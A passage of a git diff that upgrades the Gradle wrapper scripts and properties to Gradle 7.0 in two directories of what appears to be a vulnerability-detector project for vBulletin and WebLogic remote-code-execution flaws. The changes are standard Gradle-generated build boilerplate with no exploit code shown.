"0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line @@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/google/detectors/rce/vbulletin/cve201916759/gradle/wrapper/gradle-wrapper.jar b/google/detectors/rce/vbulletin/cve201916759/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/google/detectors/rce/vbulletin/cve201916759/gradle/wrapper/gradle-wrapper.jar and b/google/detectors/rce/vbulletin/cve201916759/gradle/wrapper/gradle-wrapper.jar differ diff --git a/google/detectors/rce/vbulletin/cve201916759/gradle/wrapper/gradle-wrapper.properties b/google/detectors/rce/vbulletin/cve201916759/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/google/detectors/rce/vbulletin/cve201916759/gradle/wrapper/gradle-wrapper.properties +++ b/google/detectors/rce/vbulletin/cve201916759/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/google/detectors/rce/vbulletin/cve201916759/gradlew b/google/detectors/rce/vbulletin/cve201916759/gradlew index fbd7c5158..1aa94a426 100755 --- a/google/detectors/rce/vbulletin/cve201916759/gradlew +++ b/google/detectors/rce/vbulletin/cve201916759/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar @@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME @@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/google/detectors/rce/vbulletin/cve201916759/gradlew.bat b/google/detectors/rce/vbulletin/cve201916759/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/google/detectors/rce/vbulletin/cve201916759/gradlew.bat +++ b/google/detectors/rce/vbulletin/cve201916759/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows @@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line @@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/google/detectors/rce/weblogic/cve202014883/gradle/wrapper/gradle-wrapper.jar b/google/detectors/rce/weblogic/cve202014883/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/google/detectors/rce/weblogic/cve202014883/gradle/wrapper/gradle-wrapper.jar and b/google/detectors/rce/weblogic/cve202014883/gradle/wrapper/gradle-wrapper.jar differ diff --git a/google/detectors/rce/weblogic/cve202014883/gradle/wrapper/gradle-wrapper.properties b/google/detectors/rce/weblogic/cve202014883/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/google/detectors/rce/weblogic/cve202014883/gradle/wrapper/gradle-wrapper.properties +++ b/google/detectors/rce/weblogic/cve202014883/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/google/detectors/rce/weblogic/cve202014883/gradlew b/google/detectors/rce/weblogic/cve202014883/gradlew index fbd7c5158..1aa94a426 100755 --- a/google/detectors/rce/weblogic/cve202014883/gradlew +++ b/google/detectors/rce/weblogic/cve202014883/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar @@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME @@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/google/detectors/rce/weblogic/cve202014883/gradlew.bat b/google/detectors/rce/weblogic/cve202014883/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/google/detectors/rce/weblogic/cve202014883/gradlew.bat +++ b/google/detectors/rce/weblogic/cve202014883/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows @@ -25,7 +25,8 @@ 